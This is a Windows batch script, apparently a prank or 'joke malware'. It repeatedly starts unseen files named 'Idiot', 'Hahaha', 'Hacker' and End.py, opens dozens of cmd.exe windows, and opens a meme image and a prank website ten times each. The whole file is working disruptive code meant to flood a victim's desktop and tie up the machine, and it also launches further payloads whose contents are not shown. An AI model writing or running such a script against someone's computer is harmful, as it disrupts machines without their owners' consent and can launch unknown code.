@echo off

start Idiot
start Idiot
start Idiot
start Cmd.bat
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot

start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha
start Hahaha

start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png
start https://i.kym-cdn.com/photos/images/newsfeed/001/021/418/82a.png

start Hacker

start Next
start Next
start Next
start Next
start Next

start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe

start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot
start Idiot

start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe

start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/

start Idiot
start Idiot
start Idiot
start Idiot
start Idiot

start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe

start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py
start End.py